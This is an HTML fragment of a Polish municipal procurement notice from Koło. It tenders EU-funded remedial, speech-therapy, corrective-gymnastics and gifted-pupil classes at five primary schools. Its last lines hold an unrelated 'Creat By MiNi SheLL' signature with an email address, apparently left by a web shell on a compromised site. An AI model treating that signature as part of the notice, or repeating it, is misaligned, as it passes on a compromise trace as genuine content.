<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)	zmiana okresu realizacji umowy, jest możliwa wyłącznie za zgodą obu stron umowy, jeżeli wystąpią okoliczności niezawinione przez Wykonawcę i nieprzewidywalne przez strony umowy w dniu jej zawarcia;
2)	zmniejszenie wartości umowy, jest możliwe wyłącznie za zgodą obu stron umowy, jeżeli wystąpią okoliczności niezawinione przez Wykonawcę i nieprzewidywalne przez strony umowy w dniu jej zawarcia;;
3)	w przypadku wystąpienia siły wyższej możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu stron umowy;
4)	w przypadku wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony, możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu stron umowy;
5)	w przypadku wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy, możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu stron umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kolo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Kole, Wydział Zamówień Publicznych, 62-600 Koło, ul. Mickiewicza 12..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2011 godzina 12:00, miejsce: Urząd Miejski w Kole, 62-600 Koło, ul. Mickiewicza 12. - Sekretariat Burmistrza Miasta Koła (pok. nr 9, na parterze)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt dofinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX - Rozwój wykształcenia i kompetencji w regionach, Poddziałanie 9.1.2. - Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych. Realizacja projektu pn. Indywidualizacja nauczania - szansą dla każdego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - Szkoła Podstawowa nr 1 im. Stanisława Konarskiego w Kole..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część zamówienia nr 1 Rodzaj zajęć: Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w  tym także zagrożonych ryzykiem dysleksji. Liczba godzin ogółem: 266 h. Liczba osób - 45. Część zamówienia nr 2 Rodzaj zajęć: zajęcia dla dzieci  z trudnościami w zdobywaniu umiejętności matematycznych. Liczba godzin ogółem: 190h. Liczba osób - 32. Część zamówienia nr 3 Rodzaj zajęć: gimnastyka korekcyjna dla dzieci z wadami postawy. Liczba godzin ogółem: 266h. Liczba osób - 51. Część zamówienia nr 4 Rodzaj zajęć: zajęcia rozwijające zainteresowania uczniów wybitnie szczególnie uzdolnionych, ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych (np. prowadzenie obserwacji przyrodniczych). Liczba godzin ogółem: 38h. Liczba osób - 10. Część zamówienia nr 5 Rodzaj zajęć: zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych (prowadzenie zajęć koła matematycznego). Liczba godzin ogółem: 38h. Liczba osób - 15. Część zamówienia nr 6 Rodzaj zajęć: zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych artystycznie (prowadzenie zajęć chóru szkolnego i zespołu muzycznego). Liczba godzin ogółem: 76h. Liczba osób -  28..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - Szkoła Podstawowa nr 2 im. Adama Mickiewicza w Kole..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część zamówienia nr 7 Rodzaj zajęć: zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w  tym także zagrożonych ryzykiem dysleksji. Liczba godzin ogółem: 90 h. Liczba osób - 15. Część zamówienia nr 8 Rodzaj zajęć: zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych. Liczba godzin ogółem: 90 h Liczba osób - 10. Część zamówienia nr 9 Rodzaj zajęć: zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy. Liczba godzin ogółem: 120 h. Liczba osób - 9. Część zamówienia nr 10 Rodzaj zajęć: gimnastyka korekcyjna dla dzieci z wadami postawy. Liczba godzin ogółem: 120 h. Liczba osób - 22. Część zamówienia nr 11 Rodzaj zajęć: zajęcia rozwijające zainteresowania uczniów wybitnie szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno - przyrodniczych. Liczba godzin ogółem: 90 h. Liczba osób - 15..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 - Szkoła Podstawowa nr 3 im. Marii Konopnickiej w Kole.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część zamówienia nr 12 Rodzaj zajęć: zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy. Liczba godzin ogółem: 70 h. Liczba osób - 30. Część zamówienia nr 13 Rodzaj zajęć: zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji społecznej. Liczba godzin ogółem: 70 h. Liczba osób - 20. Część zamówienia  nr 14 Rodzaj zajęć: Gimnastyka korekcyjna dla dzieci z wadami postawy. Liczba godzin ogółem: 105 h. Liczba osób - 36. Część zamówienia nr 15 Rodzaj zajęć: specjalistyczne zajęcia terapeutyczne: terapia zajęciowa. Liczba godzin ogółem: 210 h. Liczba osób - 66. Część zamówienia nr 16 Rodzaj zajęć: zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych artystycznie. Liczba godzin ogółem: 105 h. Liczba osób - 40..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4 - Szkoła Podstawowa nr 4 im. Kawalerów Orderu Uśmiechu w Kole.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część zamówienia nr 17 Rodzaj zajęć: zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w  tym także zagrożonych ryzykiem dysleksji. Liczba godzin ogółem: 108 h. Liczba osób - 12. Część zamówienia nr 18 Rodzaj zajęć: zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych. Liczba godzin ogółem: 108 h. Liczba osób - 10. Część zamówienia nr 19 Rodzaj zajęć: gimnastyka korekcyjna dla dzieci z wadami postawy. Liczba godzin ogółem: 108 h.  Liczba osób - 13. Część zamówienia nr 20 Rodzaj zajęć: zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych artystycznie. Liczba godzin ogółem: 108 h. Liczba osób - 15. Część zamówienia nr 21 Rodzaj zajęć: zajęcia rozwijające zainteresowania uczniów wybitnie szczególnie uzdolnionych, ze szczególnym uwzględnieniem nauk matematyczno -przyrodniczych. Liczba godzin ogółem: 72 h. Liczba osób - 17. Część zamówienia nr 22 Rodzaj zajęć: zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych matematycznie. Liczba godzin ogółem: 72 h. Liczba osób - 12..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5 - Szkoła Podstawowa nr 5 im. Arkadego Fiedlera w Kole.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część zamówienia nr 23 Rodzaj zajęć: zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w  tym także zagrożonych ryzykiem dysleksji. Liczba godzin ogółem: 90 h. Liczba osób - 30. Część zamówienia nr 24 Rodzaj zajęć: zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych. Liczba godzin ogółem: 90 h. Liczba osób - 30. Część zamówienia nr 25 Rodzaj zajęć: gimnastyka korekcyjna dla dzieci z wadami postawy. Liczba godzin ogółem: 90 h. Liczba osób - 30.Część zamówienia nr 26 Rodzaj zajęć: zajęcia rozwijające zainteresowania uczniów wybitnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno - przyrodniczych. Liczba godzin ogółem: 90 h. Liczba osób - 30. Część zamówienia nr 27 Rodzaj zajęć: zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych (edukacja regionalna). Liczba godzin ogółem: 60 h.  Liczba osób - 25.Część zamówienia nr 28 Rodzaj zajęć: Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych artystycznie - zajęcia plastyczno -teatralne. Liczba godzin ogółem: 180 h. Liczba osób - 50..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com